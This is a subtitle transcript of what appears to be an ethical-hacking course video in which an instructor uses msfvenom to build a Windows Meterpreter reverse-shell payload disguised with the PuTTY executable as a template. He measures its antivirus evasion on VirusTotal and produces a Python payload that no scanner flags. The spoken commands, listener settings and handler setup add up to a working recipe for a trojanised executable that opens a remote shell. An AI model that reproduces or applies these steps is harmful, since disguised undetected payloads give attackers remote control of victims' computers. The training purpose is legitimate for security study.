1
00:00:01,020 --> 00:00:03,900
Instructor: And here it is, the scan has finished.

2
00:00:03,900 --> 00:00:08,039
Right now, we get the number of 38 out of 67.

3
00:00:08,039 --> 00:00:10,290
So we successfully managed to bypass

4
00:00:10,290 --> 00:00:12,900
five additional antivirus softwares

5
00:00:12,900 --> 00:00:15,360
using the additional commands that we added

6
00:00:15,360 --> 00:00:17,463
to our msfvenom payload.

7
00:00:18,630 --> 00:00:22,140
However, let's try to make it even less than this,

8
00:00:22,140 --> 00:00:24,360
just by using the msfvenom.

9
00:00:24,360 --> 00:00:26,580
There is another option that we can do

10
00:00:26,580 --> 00:00:28,860
which is -x.

11
00:00:28,860 --> 00:00:31,800
And if we go to the help menu right here,

12
00:00:31,800 --> 00:00:35,223
we can see that -x stands for template.

13
00:00:36,510 --> 00:00:40,290
X allows us to use another program as its template.

14
00:00:40,290 --> 00:00:41,610
In other words, this means

15
00:00:41,610 --> 00:00:44,040
we can make our payload look similar

16
00:00:44,040 --> 00:00:45,453
to that other program.

17
00:00:46,350 --> 00:00:48,630
Now this sometimes knows not to work,

18
00:00:48,630 --> 00:00:49,710
but let's give it a try

19
00:00:49,710 --> 00:00:50,790
and see whether we manage

20
00:00:50,790 --> 00:00:53,493
to bypass more antiviruses with this.

21
00:00:54,690 --> 00:00:56,790
For this, we can use any program that we want.

22
00:00:56,790 --> 00:01:00,390
I'm going to go with the program called PuTTY.

23
00:01:00,390 --> 00:01:03,273
So I'm going to go right here and type putty.

24
00:01:04,560 --> 00:01:07,590
You can use any other executable file that you want.

25
00:01:07,590 --> 00:01:09,270
And under the download PuTTY,

26
00:01:09,270 --> 00:01:10,653
I will click on that link.

27
00:01:11,490 --> 00:01:13,380
It tells me you can download PuTTY here.

28
00:01:13,380 --> 00:01:14,583
I will click on here,

29
00:01:15,480 --> 00:01:17,490
and if I go all the way down,

30
00:01:17,490 --> 00:01:20,790
I am searching for the executable file, so .exe.

31
00:01:20,790 --> 00:01:24,060
And here it is, 64-bit putty.exe.

32
00:01:24,060 --> 00:01:25,560
I will click on this,

33
00:01:25,560 --> 00:01:28,263
and I will save it in my downloads folder.

34
00:01:29,280 --> 00:01:30,113
Great.

35
00:01:30,113 --> 00:01:30,990
I will click on okay.

36
00:01:30,990 --> 00:01:34,350
And if I go right here, open the downloads folder,

37
00:01:34,350 --> 00:01:37,140
here I will have the PuTTY executable.

38
00:01:37,140 --> 00:01:39,360
And just in case you don't know,

39
00:01:39,360 --> 00:01:42,603
on Windows, PuTTY executable looks like this.

40
00:01:43,980 --> 00:01:48,180
So it has this icon and it is called putty.exe.

41
00:01:48,180 --> 00:01:49,380
Remember how it looks.

42
00:01:49,380 --> 00:01:51,330
Let me just delete it real quick,

43
00:01:51,330 --> 00:01:54,153
and I will open Terminal in my downloads folder,

44
00:01:55,290 --> 00:01:57,133
and run the command msfvenom -p.

45
00:01:58,626 --> 00:02:03,626
I will use the 64-bit meterpreter/reverse_tcp.

46
00:02:03,635 --> 00:02:06,545
LHOST will be 192.168.1.12.

47
00:02:06,545 --> 00:02:08,699
LPORT will be equal to 5555.

48
00:02:08,699 --> 00:02:11,730
And I will only add the -x option

49
00:02:11,730 --> 00:02:15,300
and select the program of putty.exe.

50
00:02:15,300 --> 00:02:17,070
Now if you're using some other executable,

51
00:02:17,070 --> 00:02:19,890
here specify the name of the other executable.

52
00:02:19,890 --> 00:02:23,430
Just make sure that you're located in the same directory

53
00:02:23,430 --> 00:02:25,890
where that executable file is

54
00:02:25,890 --> 00:02:28,050
in order to run this command.

55
00:02:28,050 --> 00:02:31,650
After that I can specify that it is format of exe,

56
00:02:31,650 --> 00:02:35,673
and output will be Putty.exe.

57
00:02:36,510 --> 00:02:37,443
Press enter.

58
00:02:38,880 --> 00:02:40,920
So the creation of the payload has finished,

59
00:02:40,920 --> 00:02:44,280
and if I go and show you how the payload looks like

60
00:02:44,280 --> 00:02:45,543
on the Windows machine.

61
00:02:46,530 --> 00:02:48,450
Let me just find this.

62
00:02:48,450 --> 00:02:51,780
And if I go and copy the Putty with the capital P

63
00:02:51,780 --> 00:02:52,803
to my desktop,

64
00:02:53,760 --> 00:02:56,310
here we can see it looks exactly the same

65
00:02:56,310 --> 00:02:58,230
as the previous file that I showed you.

66
00:02:58,230 --> 00:03:01,650
Just in case, this is our Meterpreter shell.

67
00:03:01,650 --> 00:03:03,060
Let me show you real quick.

68
00:03:03,060 --> 00:03:07,020
If I go and open msfconsole

69
00:03:07,020 --> 00:03:09,780
and I set up the multi/handle listener.

70
00:03:09,780 --> 00:03:11,790
So multi/handler.

71
00:03:11,790 --> 00:03:12,960
Set payload to be

72
00:03:12,960 --> 00:03:17,960
windows/x64/meterpreter/reverse_tcp.

73
00:03:20,910 --> 00:03:23,907
Set LHOST to be 192.168.1.12.

74
00:03:23,907 --> 00:03:27,510
And set LPORT to be 5555.

75
00:03:27,510 --> 00:03:29,520
I type run here,

76
00:03:29,520 --> 00:03:32,760
and then I run this putty.exe,

77
00:03:32,760 --> 00:03:34,110
go back to my Kali Linux,

78
00:03:34,110 --> 00:03:37,080
and we will have the Meterpreter session one opened.

79
00:03:37,080 --> 00:03:38,790
Get user ID will tell me

80
00:03:38,790 --> 00:03:41,700
that I am this Windows 10 machine.

81
00:03:41,700 --> 00:03:42,533
Okay, great.

82
00:03:42,533 --> 00:03:45,210
But this is out of the scope for this video.

83
00:03:45,210 --> 00:03:48,690
Let us check out what detection rate

84
00:03:48,690 --> 00:03:51,930
does this newly generated payload have.

85
00:03:51,930 --> 00:03:53,220
So let's go right here.

86
00:03:53,220 --> 00:03:55,830
Choose file, navigate to downloads,

87
00:03:55,830 --> 00:03:58,830
because there is where our putty.exe is.

88
00:03:58,830 --> 00:04:02,163
Select the payload and confirm upload.

89
00:04:03,210 --> 00:04:06,450
And let's see if we generate the payload with the template.

90
00:04:06,450 --> 00:04:08,850
Do we manage to bypass more antiviruses

91
00:04:08,850 --> 00:04:11,550
than with the previous two payloads?

92
00:04:11,550 --> 00:04:14,100
And it seems that we do.

93
00:04:14,100 --> 00:04:17,910
In the previous one, we had 38 out of 67.

94
00:04:17,910 --> 00:04:21,300
Right now, we have 29 out of 69.

95
00:04:21,300 --> 00:04:25,590
So we managed to bypass additional eight antivirus vendors.

96
00:04:25,590 --> 00:04:26,423
Great.

97
00:04:26,423 --> 00:04:28,560
This looks better than the last two.

98
00:04:28,560 --> 00:04:30,570
I'm going to control C this,

99
00:04:30,570 --> 00:04:31,710
or just close this.

100
00:04:31,710 --> 00:04:33,900
And of course, if you wanted to generate

101
00:04:33,900 --> 00:04:36,720
a fully undetectable payload with msfvenom,

102
00:04:36,720 --> 00:04:39,060
you can always change the file format.

103
00:04:39,060 --> 00:04:41,430
But that comes with other problems.

104
00:04:41,430 --> 00:04:43,080
Let me show you real quick.

105
00:04:43,080 --> 00:04:45,240
So if I go right here under downloads

106
00:04:45,240 --> 00:04:48,150
and let's say we wanted to generate a Windows payload,

107
00:04:48,150 --> 00:04:50,040
but not as an EXE file,

108
00:04:50,040 --> 00:04:51,720
but as a Python file.

109
00:04:51,720 --> 00:04:52,770
We can run the command

110
00:04:52,770 --> 00:04:57,770
msfvenom -p windows/x64/meterpreter/reverse_tcp.

111
00:05:04,537 --> 00:05:05,857
LHOST equals 192.168.1.12.

112
00:05:06,968 --> 00:05:08,883
LPORT equals 5555.

113
00:05:09,750 --> 00:05:11,490
-: F is something that we want to change,

114
00:05:11,490 --> 00:05:13,370
so it is no longer going to be EXE,

115
00:05:13,370 --> 00:05:16,140
it is going to be a Python file.

116
00:05:16,140 --> 00:05:20,800
And we output it with -o as a python_payload.py

117
00:05:23,310 --> 00:05:24,360
Press enter,

118
00:05:24,360 --> 00:05:27,600
and this will create the Windows Meterpreter payload

119
00:05:27,600 --> 00:05:29,253
just as a Python file.

120
00:05:30,090 --> 00:05:31,620
Here it is, it is done.

121
00:05:31,620 --> 00:05:33,840
And if we go to VirusTotal,

122
00:05:33,840 --> 00:05:36,780
upload the Python payload, right here,

123
00:05:36,780 --> 00:05:38,760
confirm the upload,

124
00:05:38,760 --> 00:05:42,480
and we can see no antivirus is able to detect it

125
00:05:42,480 --> 00:05:44,070
as a malicious program.

126
00:05:44,070 --> 00:05:46,920
It is FUD, or in other words,

127
00:05:46,920 --> 00:05:50,220
it is fully undetectable payload.

128
00:05:50,220 --> 00:05:53,910
However, how are you going to run it on the target machine?

129
00:05:53,910 --> 00:05:57,030
Windows machines don't have Python installed by default

130
00:05:57,030 --> 00:05:58,830
like Linux machines do.

131
00:05:58,830 --> 00:06:01,170
So this payload would only be useful

132
00:06:01,170 --> 00:06:04,200
if the target machine has Python installed.

133
00:06:04,200 --> 00:06:06,030
Otherwise it is completely useless,

134
00:06:06,030 --> 00:06:08,403
as it cannot run without Python.

135
00:06:09,510 --> 00:06:10,740
Okay, great.

136
00:06:10,740 --> 00:06:13,740
We covered msfvenom and some of its commands.

137
00:06:13,740 --> 00:06:16,500
I advise you to experiment even more with the msfvenom,

138
00:06:16,500 --> 00:06:17,580
and for example,

139
00:06:17,580 --> 00:06:20,520
you can start creating other payloads if you want.

140
00:06:20,520 --> 00:06:22,200
We only created Windows payloads,

141
00:06:22,200 --> 00:06:24,990
but if you have a Linux machine or a macOS machine

142
00:06:24,990 --> 00:06:26,280
that you want to attack,

143
00:06:26,280 --> 00:06:27,420
you can generate payloads

144
00:06:27,420 --> 00:06:30,270
for those operating systems as well.

145
00:06:30,270 --> 00:06:31,920
To check out all the available payloads

146
00:06:31,920 --> 00:06:32,970
that you can create,

147
00:06:32,970 --> 00:06:35,730
you can type the command right here,

148
00:06:35,730 --> 00:06:40,730
msfvenom--list and then payloads.

149
00:06:41,160 --> 00:06:44,040
And here we can see a lot of different ones.

150
00:06:44,040 --> 00:06:46,650
We can go up here, here are only Windows payloads,

151
00:06:46,650 --> 00:06:48,753
but if we scroll all the way up,

152
00:06:50,010 --> 00:06:52,560
here are Solaris payloads, ruby payloads,

153
00:06:52,560 --> 00:06:54,960
and these are just some programming languages.

154
00:06:54,960 --> 00:06:57,060
But here, if we scroll all the way up,

155
00:06:57,060 --> 00:06:59,040
we get to the osx payloads.

156
00:06:59,040 --> 00:07:01,800
So you can attack OS X operating systems.

157
00:07:01,800 --> 00:07:04,770
If we go even more up, here are Linux operating systems

158
00:07:04,770 --> 00:07:08,070
and Linux meterpreter_reverse_tcp payloads.

159
00:07:08,070 --> 00:07:10,770
We also get the bind shell payloads.

160
00:07:10,770 --> 00:07:12,390
We get up here the Linux payloads

161
00:07:12,390 --> 00:07:14,670
for the 64-bit systems as well.

162
00:07:14,670 --> 00:07:17,523
So you can attack any operating system that you want.

163
00:07:18,600 --> 00:07:19,433
Great.

164
00:07:19,433 --> 00:07:21,210
Now that we took a look at msfvenom,

165
00:07:21,210 --> 00:07:23,400
and we covered some of its options,

166
00:07:23,400 --> 00:07:26,100
let's also take a look at some other tools

167
00:07:26,100 --> 00:07:28,440
that we can use for payload creation.

168
00:07:28,440 --> 00:07:29,740
See you in the next video.